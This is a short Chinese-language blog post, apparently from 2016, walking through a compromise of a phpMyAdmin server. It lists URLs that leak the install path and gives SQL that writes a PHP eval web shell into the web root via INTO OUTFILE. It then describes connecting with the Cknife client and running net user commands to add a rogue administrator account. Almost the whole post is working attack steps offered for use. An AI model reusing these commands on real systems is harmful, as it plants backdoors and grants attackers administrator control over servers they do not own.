利用phpMyAdmin提权
发表于 2016-03-31 | 分类于 phpMyAdmin | 暂无评论 | 9次阅读
爆路径
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpMyAdmin/index.php?lang[]=1
- /phpMyAdmin/phpinfo.php
- /load_file()
- /phpmyadmin/themes/darkblue_orange/layout.inc.php
- /phpmyadmin/libraries/select_lang.lib.php
- /phpmyadmin/libraries/lect_lang.lib.php
- /phpmyadmin/libraries/mcrypt.lib.php
得到物理路径 C:\wamp\www\phpmyadmin\themes\darkblue_orange\layout.inc.php
写马
1234 |
Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES("<?php eval($_POST[Cknife]);?>");select cmd from a into outfile "C:/wamp/www/phpmyadmin/d.php";Drop TABLE IF EXISTS a; |
获得webshell
最后用Cknife连接,创建帐户并添加到管理员用户组net user admin admin /add
net localgroup administrator admin /add
原文链接:http://blog.alpace.xyz/2016/03/31/20160331/
时间: 2024-10-11 23:27:42